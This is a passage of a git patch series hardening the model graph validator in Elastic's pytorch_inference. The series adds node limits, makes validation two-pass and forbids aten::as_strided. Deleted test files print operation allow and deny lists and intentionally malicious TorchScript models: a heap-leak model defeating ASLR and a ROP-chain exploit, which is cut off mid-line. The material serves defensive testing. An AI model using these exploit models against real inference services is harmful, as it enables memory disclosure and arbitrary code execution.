--------------------------------------------------------------------------- + + +def run_pytorch_inference( + binary: Union[str, Path], + model_path: Union[str, Path], + tmp_dir: Union[str, Path], + *, + timeout: int = 30, + extra_args: Optional[list[str]] = None, +) -> tuple[int, str, str]: + """Run pytorch_inference against a model file. + + Wraps the .pt archive in the CBufferedIStreamAdapter framing format, + then invokes the binary as a subprocess. + + Args: + binary: Path to the pytorch_inference executable. + model_path: Path to the .pt model archive. + tmp_dir: Temporary directory for the size-prefixed restore file. + timeout: Maximum seconds to wait for the process (default 30). + extra_args: Additional command-line arguments to pass to the binary. + + Returns: + Tuple of (exit_code, stdout, stderr) where stdout and stderr are + decoded as UTF-8. + + Raises: + subprocess.TimeoutExpired: if the process exceeds the timeout. + """ + model_path = Path(model_path) + tmp_dir = Path(tmp_dir) + + restore_file = tmp_dir / f"{model_path.stem}_restore.bin" + prepare_restore_file(model_path, restore_file) + + cmd = [ + str(binary), + f"--restore={restore_file}", + "--validElasticLicenseKeyConfirmed=true", + ] + if extra_args: + cmd.extend(extra_args) + + proc = subprocess.run( + cmd, + stdin=subprocess.DEVNULL, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + timeout=timeout, + ) + return ( + proc.returncode, + proc.stdout.decode("utf-8", errors="replace"), + proc.stderr.decode("utf-8", errors="replace"), + ) diff --git a/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py b/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py index bbe83d772..2c3af4594 100644 --- a/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py +++ b/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py @@ -50,9 +50,7 @@ import argparse import os -import platform import shutil -import struct import subprocess import sys import tempfile @@ -61,6 +59,12 @@ import torch from torch import Tensor +from pytorch_inference_test_utils import ( + find_pytorch_inference, + run_pytorch_inference, + script_and_save_model, +) + # --------------------------------------------------------------------------- # Attack model definitions (from PR #2873 sandbox2 security research) @@ -197,61 +201,7 @@ def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: # --------------------------------------------------------------------------- -# Binary discovery -# --------------------------------------------------------------------------- - -# Standard locations where the pytorch_inference binary may be found, -# relative to the ml-cpp project root. -_BUILD_DIR_NAMES = [ - "cmake-build-relwithdebinfo", - "cmake-build-debug", - "cmake-build-release", -] - - -def find_pytorch_inference() -> str: - """Locate the pytorch_inference binary in standard build locations. - - Searches the CMake build directories and the Gradle distribution bundle. - Raises FileNotFoundError if no executable is found. - """ - project_root = Path(__file__).resolve().parent.parent.parent.parent.parent - - machine = platform.machine() - if machine in ("arm64", "aarch64"): - darwin_arch = "darwin-aarch64" - linux_arch = "linux-aarch64" - else: - darwin_arch = "darwin-x86_64" - linux_arch = "linux-x86_64" - - candidates = [ - # macOS distribution bundle (Gradle build) - project_root / "build" / "distribution" / "platform" / darwin_arch - / "controller.app" / "Contents" / "MacOS" / "pytorch_inference", - # Linux distribution (Gradle build) - project_root / "build" / "distribution" / "platform" / linux_arch - / "bin" / "pytorch_inference", - ] - - # CMake build directories - for build_dir in _BUILD_DIR_NAMES: - candidates.append( - project_root / build_dir / "bin" / "pytorch_inference" / "pytorch_inference" - ) - - for path in candidates: - if path.is_file() and os.access(path, os.X_OK): - return str(path) - - raise FileNotFoundError( - "Could not find pytorch_inference binary. " - "Build from the feature/harden_pytorch_inference branch, or pass --binary." - ) - - -# --------------------------------------------------------------------------- -# Model generation and binary framing +# Test configuration # --------------------------------------------------------------------------- MODELS = { @@ -274,33 +224,6 @@ def find_pytorch_inference() -> str: }, } - -def generate_model(cls, path: Path) -> None: - """TorchScript-compile a model class and save as a .pt archive.""" - model = cls() - scripted = torch.jit.script(model) - torch.jit.save(scripted, str(path)) - - -def prepare_restore_file(model_path: Path, restore_path: Path) -> None: - """Wrap a .pt file with the 4-byte big-endian size header expected by - CBufferedIStreamAdapter. - - pytorch_inference reads models via CBufferedIStreamAdapter which expects: - [4 bytes: uint32 big-endian model size][model bytes...] - This matches the framing Elasticsearch uses when sending models over - the named-pipe / stdin transport. - """ - model_bytes = model_path.read_bytes() - with open(restore_path, "wb") as f: - f.write(struct.pack("!I", len(model_bytes))) - f.write(model_bytes) - - -# --------------------------------------------------------------------------- -# Test execution -# --------------------------------------------------------------------------- - # Phrases that indicate the graph validator actively rejected the model. # Must be specific enough to avoid matching benign log lines like # "Model verified: no forbidden operations detected." @@ -313,34 +236,9 @@ def prepare_restore_file(model_path: Path, restore_path: Path) -> None: ] -def run_pytorch_inference( - binary: str, model_path: Path, tmp_dir: Path, timeout: int = 30 -) -> tuple[int, str, str]: - """Run pytorch_inference against a model file. - - Wraps the .pt file in the size-prefixed restore format, then invokes - the binary. Returns (exit_code, stdout, stderr). - """ - restore_file = tmp_dir / f"{model_path.stem}_restore.bin" - prepare_restore_file(model_path, restore_file) - - cmd = [ - binary, - f"--restore={restore_file}", - "--validElasticLicenseKeyConfirmed=true", - ] - proc = subprocess.run( - cmd, - stdin=subprocess.DEVNULL, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - timeout=timeout, - ) - return ( - proc.returncode, - proc.stdout.decode("utf-8", errors="replace"), - proc.stderr.decode("utf-8", errors="replace"), - ) +# --------------------------------------------------------------------------- +# Test execution +# --------------------------------------------------------------------------- def run_tests(binary: str) -> bool: @@ -362,7 +260,7 @@ def run_tests(binary: str) -> bool: print(f"--- {name}: {spec['description']} ---") try: - generate_model(spec["class"], model_path) + script_and_save_model(spec["class"](), model_path) print(f" Model generated: {model_path.name} ({model_path.stat().st_size} bytes)") except Exception as e: print(f" SKIP: could not generate model: {e}") @@ -370,7 +268,9 @@ def run_tests(binary: str) -> bool: continue try: - exit_code, stdout, stderr = run_pytorch_inference(binary, model_path, tmp_dir) + exit_code, stdout, stderr = run_pytorch_inference( + binary, model_path, tmp_dir + ) except subprocess.TimeoutExpired: print(f" FAIL: pytorch_inference timed out (30s)") all_passed = False From 5b455deb27082d2c179a21d48120604f1fb215b1 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Thu, 12 Mar 2026 11:48:58 +1300 Subject: [PATCH 28/30] Address review feedback: fail fast, harden error handling, tidy up - Check MAX_NODE_COUNT during graph traversal to prevent resource exhaustion on pathologically large models (bail out immediately in collectBlockOps and collectModuleOps). - Two-pass validation: check forbidden ops first, skip unrecognised op scan when forbidden ops are found. - Add aten::as_strided to FORBIDDEN_OPERATIONS (key enabler of heap-leak and ROP chain attacks). - Change LOG_FATAL to HANDLE_FATAL in the c10::Error catch block so an exception during validation terminates the process. - Fix CHANGELOG asciidoc link syntax. - Move generate_malicious_models.py to dev-tools/. - Remove redundant Python test scripts now that C++ integration tests cover the same attack models. - Remove PR cross-references from comments per reviewer request. Made-with: Cursor --- bin/pytorch_inference/CModelGraphValidator.cc | 35 +- bin/pytorch_inference/CSupportedOperations.cc | 3 + bin/pytorch_inference/Main.cc | 2 +- .../unittest/CModelGraphValidatorTest.cc | 19 +- .../testfiles/pytorch_inference_test_utils.py | 248 ----------- .../test_graph_validation_evil_models.py | 416 ------------------ .../test_pytorch_inference_evil_models.py | 367 --------------- .../generate_malicious_models.py | 4 +- docs/CHANGELOG.asciidoc | 2 +- 9 files changed, 43 insertions(+), 1053 deletions(-) delete mode 100644 bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py delete mode 100644 bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py delete mode 100644 bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py rename {bin/pytorch_inference/unittest/testfiles => dev-tools}/generate_malicious_models.py (97%) diff --git a/bin/pytorch_inference/CModelGraphValidator.cc b/bin/pytorch_inference/CModelGraphValidator.cc index 685ee60c1..01658b440 100644 --- a/bin/pytorch_inference/CModelGraphValidator.cc +++ b/bin/pytorch_inference/CModelGraphValidator.cc @@ -28,6 +28,12 @@ CModelGraphValidator::SResult CModelGraphValidator::validate(const ::torch::jit: std::size_t nodeCount{0}; collectModuleOps(module, observedOps, nodeCount); + if (nodeCount > MAX_NODE_COUNT) { + LOG_ERROR(<< "Model graph is too large: " << nodeCount + << " nodes exceeds limit of " << MAX_NODE_COUNT); + return {false, {}, {}, nodeCount}; + } + LOG_DEBUG(<< "Model graph contains " << observedOps.size() << " distinct operations across " << nodeCount << " nodes"); for (const auto& op : observedOps) { @@ -47,17 +53,22 @@ CModelGraphValidator::validate(const TStringSet& observedOps, SResult result; - // Check forbidden ops first so they are always reported with a specific - // error even if they also appear in the allowed set. See the comment on - // CSupportedOperations::FORBIDDEN_OPERATIONS for the rationale behind - // maintaining both a forbidden list and an allowed list. + // Two-pass check: forbidden ops first, then unrecognised. This lets us + // fail fast when a known-dangerous operation is present and avoids the + // cost of scanning for unrecognised ops on a model we will reject anyway. for (const auto& op : observedOps) { if (forbiddenOps.contains(op)) { result.s_IsValid = false; result.s_ForbiddenOps.push_back(op); - } else if (allowedOps.contains(op) == false) { - result.s_IsValid = false; - result.s_UnrecognisedOps.push_back(op); + } + } + + if (result.s_ForbiddenOps.empty()) { + for (const auto& op : observedOps) { + if (allowedOps.contains(op) == false) { + result.s_IsValid = false; + result.s_UnrecognisedOps.push_back(op); + } } } @@ -71,10 +82,15 @@ void CModelGraphValidator::collectBlockOps(const ::torch::jit::Block& block, TStringSet& ops, std::size_t& nodeCount) { for (const auto* node : block.nodes()) { - ++nodeCount; + if (++nodeCount > MAX_NODE_COUNT) { + return; + } ops.emplace(node->kind().toQualString()); for (const auto* subBlock : node->blocks()) { collectBlockOps(*subBlock, ops, nodeCount); + if (nodeCount > MAX_NODE_COUNT) { + return; + } } } } @@ -90,6 +106,9 @@ void CModelGraphValidator::collectModuleOps(const ::torch::jit::Module& module, auto graph = method.graph()->copy(); ::torch::jit::Inline(*graph); collectBlockOps(*graph->block(), ops, nodeCount); + if (nodeCount > MAX_NODE_COUNT) { + return; + } } } } diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index 074a2fa4b..1776d492e 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -17,6 +17,9 @@ namespace torch { using namespace std::string_view_literals; const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERATIONS = { + // Arbitrary memory access — enables heap scanning, address leaks, and + // ROP chain construction. + "aten::as_strided"sv, "aten::from_file"sv, "aten::save"sv, // After graph inlining, method and function calls should be resolved. diff --git a/bin/pytorch_inference/Main.cc b/bin/pytorch_inference/Main.cc index 0ed6980f1..4a7d2dde6 100644 --- a/bin/pytorch_inference/Main.cc +++ b/bin/pytorch_inference/Main.cc @@ -70,7 +70,7 @@ void verifySafeModel(const torch::jit::script::Module& module_) { LOG_DEBUG(<< "Model verified: " << result.s_NodeCount << " nodes, all operations match supported architectures."); } catch (const c10::Error& e) { - LOG_FATAL(<< "Model graph validation failed: " << e.what()); + HANDLE_FATAL(<< "Model graph validation failed: " << e.what()); } } } diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 8a9b89fbe..dab37505c 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -93,6 +93,8 @@ BOOST_AUTO_TEST_CASE(testUnrecognisedOpsRejected) { } BOOST_AUTO_TEST_CASE(testMixedForbiddenAndUnrecognised) { + // When forbidden ops are present, the validator short-circuits and + // does not report unrecognised ops — we reject immediately. TStringSet observed{"aten::save", "custom::backdoor", "aten::linear"}; auto result = CModelGraphValidator::validate( @@ -102,8 +104,7 @@ BOOST_AUTO_TEST_CASE(testMixedForbiddenAndUnrecognised) { BOOST_REQUIRE(result.s_IsValid == false); BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); BOOST_REQUIRE_EQUAL("aten::save", result.s_ForbiddenOps[0]); - BOOST_REQUIRE_EQUAL(1, result.s_UnrecognisedOps.size()); - BOOST_REQUIRE_EQUAL("custom::backdoor", result.s_UnrecognisedOps[0]); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); } BOOST_AUTO_TEST_CASE(testResultsSorted) { @@ -401,13 +402,13 @@ BOOST_AUTO_TEST_CASE(testMaliciousFileReaderInSubmodule) { BOOST_REQUIRE(hasForbiddenOp(result, "aten::from_file")); } -// --- Sandbox2 attack models (PR #2873) --- +// --- Sandbox2 attack models --- // // These reproduce real-world attack vectors that exploit torch.as_strided // to read out-of-bounds heap memory, leak libtorch addresses, and build // ROP chains that call mprotect + shellcode to write arbitrary files. -// The graph validator must reject them because aten::as_strided (and -// several helper ops like aten::item) are not in the allowlist. +// The graph validator must reject them because aten::as_strided is in +// the forbidden operations list. BOOST_AUTO_TEST_CASE(testMaliciousHeapLeak) { // A model that uses torch.as_strided with a malicious storage offset @@ -417,9 +418,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousHeapLeak) { auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); - BOOST_REQUIRE(result.s_ForbiddenOps.empty()); - BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::as_strided")); - BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::item")); + BOOST_REQUIRE(hasForbiddenOp(result, "aten::as_strided")); } BOOST_AUTO_TEST_CASE(testMaliciousRopExploit) { @@ -430,9 +429,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousRopExploit) { auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); - BOOST_REQUIRE(result.s_ForbiddenOps.empty()); - BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::as_strided")); - BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::item")); + BOOST_REQUIRE(hasForbiddenOp(result, "aten::as_strided")); } BOOST_AUTO_TEST_SUITE_END() diff --git a/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py b/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py deleted file mode 100644 index 794e19b03..000000000 --- a/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py +++ /dev/null @@ -1,248 +0,0 @@ -#!/usr/bin/env python3 -# -# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -# or more contributor license agreements. Licensed under the Elastic License -# 2.0 and the following additional limitation. Functionality enabled by the -# files subject to the Elastic License 2.0 may only be used in production when -# invoked by an Elasticsearch process with a license key installed that permits -# use of machine learning features. You may not use this file except in -# compliance with the Elastic License 2.0 and the foregoing additional -# limitation. -# -"""Shared utilities for pytorch_inference integration tests. - -This module provides reusable helpers for: - - * TorchScript model compilation and serialisation - * Binary framing in the CBufferedIStreamAdapter format (the 4-byte - big-endian size header that Elasticsearch uses to send models to the - pytorch_inference process) - * Auto-discovery of the pytorch_inference binary across standard - build directory layouts (CMake, Gradle) - * Running pytorch_inference as a subprocess with proper arguments - -Typical usage from another test script: - - from pytorch_inference_test_utils import ( - script_and_save_model, - prepare_restore_file, - find_pytorch_inference, - run_pytorch_inference, - ) - - # Save a TorchScript model - script_and_save_model(MyModel(), Path("/tmp/my_model.pt")) - - # Wrap it in the binary framing format and run the binary - binary = find_pytorch_inference() - exit_code, stdout, stderr = run_pytorch_inference( - binary, Path("/tmp/my_model.pt"), tmp_dir - ) -""" - -import os -import platform -import struct -import subprocess -from pathlib import Path -from typing import Optional, Union - -import torch - - -# --------------------------------------------------------------------------- -# Model compilation and serialisation -# --------------------------------------------------------------------------- - - -def script_and_save_model( - model: torch.nn.Module, - output_path: Union[str, Path], - *, - eval_mode: bool = True, -) -> Path: - """TorchScript-compile a model and save it as a .pt archive. - - Args: - model: An nn.Module instance to compile via torch.jit.script. - output_path: Destination file path for the saved .pt archive. - eval_mode: If True (default), call model.eval() before scripting. - Disabling dropout and similar layers matches inference - behaviour. - - Returns: - The resolved Path of the saved file. - """ - output_path = Path(output_path) - if eval_mode: - model.eval() - scripted = torch.jit.script(model) - torch.jit.save(scripted, str(output_path)) - return output_path - - -# --------------------------------------------------------------------------- -# CBufferedIStreamAdapter binary framing -# --------------------------------------------------------------------------- - - -def prepare_restore_file( - model_path: Union[str, Path], - restore_path: Union[str, Path], -) -> Path: - """Wrap a .pt archive with the size-prefixed binary framing that - pytorch_inference expects. - - The pytorch_inference process reads models through - CBufferedIStreamAdapter, which expects: - - [4 bytes: uint32 network-byte-order (big-endian) model size] - [N bytes: raw model archive] - - This matches the framing that Elasticsearch writes when it sends a - model over the named-pipe / stdin transport to the native process. - - Args: - model_path: Path to the raw .pt archive produced by torch.jit.save. - restore_path: Destination path for the size-prefixed binary file. - - Returns: - The resolved Path of the restore file. - """ - model_path = Path(model_path) - restore_path = Path(restore_path) - - model_bytes = model_path.read_bytes() - with open(restore_path, "wb") as f: - f.write(struct.pack("!I", len(model_bytes))) - f.write(model_bytes) - return restore_path - - -# --------------------------------------------------------------------------- -# Binary discovery -# --------------------------------------------------------------------------- - -_CMAKE_BUILD_DIR_NAMES = [ - "cmake-build-relwithdebinfo", - "cmake-build-debug", - "cmake-build-release", -] - - -def find_pytorch_inference( - project_root: Optional[Union[str, Path]] = None, -) -> str: - """Locate the pytorch_inference binary in standard build locations. - - Searches, in order: - 1. macOS Gradle distribution bundle - 2. Linux Gradle distribution bundle - 3. CMake build directories (RelWithDebInfo, Debug, Release) - - Args: - project_root: Explicit path to the ml-cpp repository root. If None, - inferred from this file's location (assumes this module - lives at bin/pytorch_inference/unittest/testfiles/). - - Returns: - Absolute path to the pytorch_inference executable. - - Raises: - FileNotFoundError: if no executable is found in any candidate location. - """ - if project_root is None: - project_root = Path(__file__).resolve().parent.parent.parent.parent.parent - else: - project_root = Path(project_root).resolve() - - machine = platform.machine() - if machine in ("arm64", "aarch64"): - darwin_arch = "darwin-aarch64" - linux_arch = "linux-aarch64" - else: - darwin_arch = "darwin-x86_64" - linux_arch = "linux-x86_64" - - candidates = [ - # macOS Gradle distribution bundle - project_root / "build" / "distribution" / "platform" / darwin_arch - / "controller.app" / "Contents" / "MacOS" / "pytorch_inference", - # Linux Gradle distribution - project_root / "build" / "distribution" / "platform" / linux_arch - / "bin" / "pytorch_inference", - ] - - for build_dir in _CMAKE_BUILD_DIR_NAMES: - candidates.append( - project_root / build_dir / "bin" / "pytorch_inference" / "pytorch_inference" - ) - - for path in candidates: - if path.is_file() and os.access(path, os.X_OK): - return str(path) - - raise FileNotFoundError( - "Could not find pytorch_inference binary. Build the project first, " - "or pass an explicit binary path." - ) - - -# --------------------------------------------------------------------------- -# Subprocess execution -# --------------------------------------------------------------------------- - - -def run_pytorch_inference( - binary: Union[str, Path], - model_path: Union[str, Path], - tmp_dir: Union[str, Path], - *, - timeout: int = 30, - extra_args: Optional[list[str]] = None, -) -> tuple[int, str, str]: - """Run pytorch_inference against a model file. - - Wraps the .pt archive in the CBufferedIStreamAdapter framing format, - then invokes the binary as a subprocess. - - Args: - binary: Path to the pytorch_inference executable. - model_path: Path to the .pt model archive. - tmp_dir: Temporary directory for the size-prefixed restore file. - timeout: Maximum seconds to wait for the process (default 30). - extra_args: Additional command-line arguments to pass to the binary. - - Returns: - Tuple of (exit_code, stdout, stderr) where stdout and stderr are - decoded as UTF-8. - - Raises: - subprocess.TimeoutExpired: if the process exceeds the timeout. - """ - model_path = Path(model_path) - tmp_dir = Path(tmp_dir) - - restore_file = tmp_dir / f"{model_path.stem}_restore.bin" - prepare_restore_file(model_path, restore_file) - - cmd = [ - str(binary), - f"--restore={restore_file}", - "--validElasticLicenseKeyConfirmed=true", - ] - if extra_args: - cmd.extend(extra_args) - - proc = subprocess.run( - cmd, - stdin=subprocess.DEVNULL, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - timeout=timeout, - ) - return ( - proc.returncode, - proc.stdout.decode("utf-8", errors="replace"), - proc.stderr.decode("utf-8", errors="replace"), - ) diff --git a/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py b/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py deleted file mode 100644 index cb855f32f..000000000 --- a/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py +++ /dev/null @@ -1,416 +0,0 @@ -#!/usr/bin/env python3 -# -# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -# or more contributor license agreements. Licensed under the Elastic License -# 2.0 and the following additional limitation. Functionality enabled by the -# files subject to the Elastic License 2.0 may only be used in production when -# invoked by an Elasticsearch process with a license key installed that permits -# use of machine learning features. You may not use this file except in -# compliance with the Elastic License 2.0 and the foregoing additional -# limitation. -# -"""Pure-Python test that sandbox2 attack models are rejected by the graph validator. - -This script mirrors the C++ CModelGraphValidator logic (allowlist, forbidden -list, recursive block traversal, graph inlining) in Python and runs it against -the evil TorchScript models from the sandbox2 security research (PR #2873). - -It provides a fast feedback loop that does not require building the C++ binary -— useful during development of the allowlist or when adding new attack model -variants. A pass here implies the C++ validator will also reject the models, -since the Python logic is a faithful port of CModelGraphValidator::validate() -and CSupportedOperations. - -The evil models reproduce two real-world attack vectors against TorchScript: - - * HeapLeakModel — uses torch.as_strided with an enormous storage offset - to create an out-of-bounds view into the process heap, then scans for - libtorch pointers to compute ASLR-defeating base addresses. - - * ExploitModel — extends the heap-leak technique to overwrite a GOT - entry (mprotect), mark a heap page as executable, and jump to embedded - shellcode that writes arbitrary files to disk. - -Both models are rejected because aten::as_strided, aten::item, and several -other operations they use are not in the transformer-architecture allowlist. - -Usage: - python3 test_graph_validation_evil_models.py - -Requires: torch (no other dependencies) -Exit code: 0 if all tests pass, 1 otherwise. -""" - -import sys -import tempfile -import shutil -from pathlib import Path - -import torch -from torch import Tensor - -# --------------------------------------------------------------------------- -# Reproduce the C++ allowlist / forbidden list from CSupportedOperations.cc -# -# These sets must be kept in sync with CSupportedOperations.cc. If you add -# or remove an operation there, update the corresponding set here. -# --------------------------------------------------------------------------- - -FORBIDDEN_OPERATIONS: set[str] = { - "aten::from_file", - "aten::save", - "prim::CallFunction", - "prim::CallMethod", -} - -ALLOWED_OPERATIONS: set[str] = { - # aten operations — covers the ops used by supported transformer - # architectures (BERT, RoBERTa, DeBERTa, DistilBERT, XLM-R, MPNET, - # E5, etc.) - "aten::Int", - "aten::IntImplicit", - "aten::ScalarImplicit", - "aten::__and__", - "aten::abs", - "aten::add", - "aten::add_", - "aten::arange", - "aten::bitwise_not", - "aten::cat", - "aten::chunk", - "aten::clamp", - "aten::contiguous", - "aten::cumsum", - "aten::div", - "aten::div_", - "aten::dropout", - "aten::embedding", - "aten::expand", - "aten::full_like", - "aten::gather", - "aten::ge", - "aten::gelu", - "aten::hash", - "aten::index", - "aten::index_put_", - "aten::layer_norm", - "aten::len", - "aten::linear", - "aten::log", - "aten::lt", - "aten::manual_seed", - "aten::masked_fill", - "aten::matmul", - "aten::max", - "aten::mean", - "aten::min", - "aten::mul", - "aten::ne", - "aten::neg", - "aten::new_ones", - "aten::ones", - "aten::pad", - "aten::permute", - "aten::pow", - "aten::rand", - "aten::relu", - "aten::repeat", - "aten::reshape", - "aten::rsub", - "aten::scaled_dot_product_attention", - "aten::select", - "aten::size", - "aten::slice", - "aten::softmax", - "aten::sqrt", - "aten::squeeze", - "aten::str", - "aten::sub", - "aten::tanh", - "aten::tensor", - "aten::to", - "aten::transpose", - "aten::type_as", - "aten::unsqueeze", - "aten::view", - "aten::where", - "aten::zeros", - # prim operations — control flow, tuple/list manipulation, and type - # queries that appear in every traced/scripted transformer model - "prim::Constant", - "prim::DictConstruct", - "prim::GetAttr", - "prim::If", - "prim::ListConstruct", - "prim::ListUnpack", - "prim::Loop", - "prim::NumToTensor", - "prim::TupleConstruct", - "prim::TupleUnpack", - "prim::device", - "prim::dtype", - "prim::max", - "prim::min", -} - -MAX_NODE_COUNT = 1_000_000 - -# --------------------------------------------------------------------------- -# Python mirror of CModelGraphValidator -# -# The three functions below replicate the C++ validation logic: -# collect_graph_ops → CModelGraphValidator::collectBlockOps -# collect_module_ops → CModelGraphValidator::collectModuleOps -# validate_model → CModelGraphValidator::validate -# --------------------------------------------------------------------------- - - -def collect_graph_ops(block) -> tuple[set[str], int]: - """Recursively collect all op names from a TorchScript IR block. - - Mirrors CModelGraphValidator::collectBlockOps — walks every node in the - block, records its kind (e.g. "aten::add"), and recurses into any nested - blocks (inside prim::If / prim::Loop nodes). - """ - ops: set[str] = set() - node_count = 0 - for node in block.nodes(): - node_count += 1 - ops.add(node.kind()) - for sub_block in node.blocks(): - sub_ops, sub_count = collect_graph_ops(sub_block) - ops.update(sub_ops) - node_count += sub_count - return ops, node_count - - -def collect_module_ops(module: torch.jit.ScriptModule) -> tuple[set[str], int]: - """Collect all ops from a module's forward graph after inlining. - - Mirrors CModelGraphValidator::collectModuleOps. Inlining resolves all - prim::CallMethod nodes, so the single forward graph captures every - operation across all submodules. - """ - graph = module.forward.graph.copy() - torch._C._jit_pass_inline(graph) - return collect_graph_ops(graph) - - -def validate_model(module: torch.jit.ScriptModule) -> dict: - """Validate a TorchScript module against the allowlist. - - Returns a dict with the same fields as CModelGraphValidator::SResult. - """ - observed_ops, node_count = collect_module_ops(module) - - forbidden_found = sorted(op for op in observed_ops if op in FORBIDDEN_OPERATIONS) - unrecognised_found = sorted( - op for op in observed_ops - if op not in FORBIDDEN_OPERATIONS and op not in ALLOWED_OPERATIONS - ) - is_valid = not forbidden_found and not unrecognised_found and node_count <= MAX_NODE_COUNT - - return { - "is_valid": is_valid, - "forbidden_ops": forbidden_found, - "unrecognised_ops": unrecognised_found, - "node_count": node_count, - "all_ops": sorted(observed_ops), - } - - -# --------------------------------------------------------------------------- -# Attack model definitions -# -# These are adapted from the sandbox2 security research (PR #2873). The -# models are intentionally malicious — they exploit implementation details -# of libtorch's memory layout to achieve arbitrary code execution. They -# must NEVER be run outside of a sandboxed environment. -# -# SimpleBenignModel is a positive control that uses only allowlisted ops. -# --------------------------------------------------------------------------- - - -class SimpleBenignModel(torch.nn.Module): - """Positive control — uses only allowlisted ops (aten::add, aten::unsqueeze).""" - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - return (a + b + c + d).unsqueeze(0) - - -class LeakModel(torch.nn.Module): - """Heap-address leak via torch.as_strided with a malicious storage offset. - - Attack vector: creates a strided view with storage_offset = - 2305843009213693952 (0x2000000000000000) minus the view length, causing - the view to reference memory far outside the tensor's actual allocation. - The model then scans this out-of-bounds memory for patterns that identify - libtorch's internal data structures, leaking the base address of - libtorch_cpu.so — defeating ASLR. - - The graph validator rejects this because aten::as_strided, aten::item, - and aten::__rshift__ are not in the allowlist. - """ - def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: - evil_length = 0x900 * 8 - leak = torch.as_strided(tensors, [evil_length], [1], 2305843009213693952 - evil_length) - index: list[int] = [-1] - for i in range(evil_length - 1 - 5, -1, -1): - if leak[i + 3].item() == leak[i + 5].item() and leak[i + 3].item() >> 40 == 127: - if leak[i + 2].item() >= 0x100000000 and leak[i + 2].item() <= 0x100000005: - index.append(i) - return (index, leak) - - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - tmp: list[Tensor] = [] - heap_len = 200 - array_len = 0x900 - for i in range(heap_len): - tmp_values = [0xdead00000 + i] + [0xdead00000 + j for j in range(2, array_len)] - tmp.append(torch.tensor(tmp_values)) - for i in range(heap_len): - indexs, leak = self.find_heap_overlap(tmp[i]) - indexs = indexs[1:] - if indexs == []: - continue - for index in indexs: - heap_addr = leak[index + 3].item() - libtorch_python_addr = leak[index + 1].item() - libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 - assert 1 == 0, "Input tensor must have at least one element: " + hex(libtorch_cpu_addr) - for i in range(heap_len): - print(tmp[i].shape) - return torch.zeros(0) - - -class ExploitModel(torch.nn.Module): - """ROP-chain exploit that attempts mprotect + shellcode for file writes. - - Attack vector: after leaking the libtorch base address (same technique - as LeakModel), this model uses the out-of-bounds strided view to - overwrite a function pointer in libtorch's GOT (Global Offset Table), - redirecting the mprotect entry to a ROP gadget chain. The chain: - 1. Calls mprotect to mark a heap page as read-write-execute. - 2. Jumps to embedded shellcode on that page. - 3. The shellcode opens and writes arbitrary files to disk. - - The graph validator rejects this because aten::as_strided, aten::item, - aten::Delete and other operations are not in the allowlist. - """ - def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: - evil_length = 0x900 * 8 - leak = torch.as_strided(tensors, [evil_length], [1], 2305843009213693952 - evil_length) - index: list[int] = [-1] - for i in range(evil_length - 1 - 5, -1, -1): - if leak[i + 3].item() == leak[i + 5].item() and leak[i + 3].item() >> 40 == 127: - if leak[i + 2].item() >= 0x100000000 and leak[i + 2].item() <= 0x100000005: - index.append(i) - return (index, leak) - - def get_address_data(self, leak: Tensor, index: int, tmp: list[Tensor], target_addr: int) -> int: - leak[index] = target_addr - return int(tmp[0].item()) - - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - tmp: list[Tensor] = [] - heap_len = 200 - array_len = 0x900 - for i in range(heap_len): - tmp_values = [0xdead00000 + i] + [0xdead00000 + j for j in range(2, array_len)] - tmp.append(torch.tensor(tmp_values)) - for i in range(heap_len): - indexs, leak = self.find_heap_overlap(tmp[i]) - indexs = indexs[1:] - if indexs == []: - continue - for index in indexs: - heap_addr = leak[index + 3].item() - libtorch_python_addr = leak[index + 1].item() - libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 - leak[index + 3] = int(heap_addr - 0x8) - for j in range(heap_len): - if tmp[j][2].item() == 0xDEAD00002 and i != j: - mprotect_got_addr = 0xc9785f0 + 